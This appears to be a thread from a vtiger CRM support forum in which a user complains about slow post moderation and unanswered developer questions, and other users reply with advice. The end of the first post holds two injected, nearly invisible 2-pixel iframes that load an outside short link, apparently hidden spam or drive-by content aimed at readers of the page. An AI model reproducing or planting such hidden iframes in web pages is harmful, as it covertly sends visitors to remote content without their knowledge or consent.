Am I the only one here?

I've been asking questions for more than a week now, and none of the have a single reply. I must wait a couple of hours, or sometimes a whole day, until the moderators check and publish my post. I'm doing some serious customization to a vtiger site, and I'm not getting help from this forum, other than searching for questions already been answered.

Am I the only one feeling this is not the right way of having a support forum? Having to wait for moderation for each and every single post or reply? Do I need to purchase or donate some money to have my posts published and replied faster? Or do I need a minimum post count?

Please tell me I'm not crazy. <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;

  • hi,

    you are not the only one here, but you are asking very advanced developer questions. this is mainly a community driven user level forum with a minority of developer/advanced users who may be able to answer some of your questions.

    i would recommend you ask these developer questions on the developers list, although i'm not sure you will get much more help, but it is worth a try.

    short of paying to get the information you need in a timely manner, there isn't much more you can do; either spend time learning or spend money.

    thanks. while i agree my questions might be more advanced that the standard usability questions, i've seen all around the forum questions like mine being answered with real helpful advise or even pieces of code, so the knowledge is here, is just that the forum moderation strategy is frustrating, having to wait so much for a simple post to get published. it loses momentum.

    they seem to have taken care of things, though. thankfully.
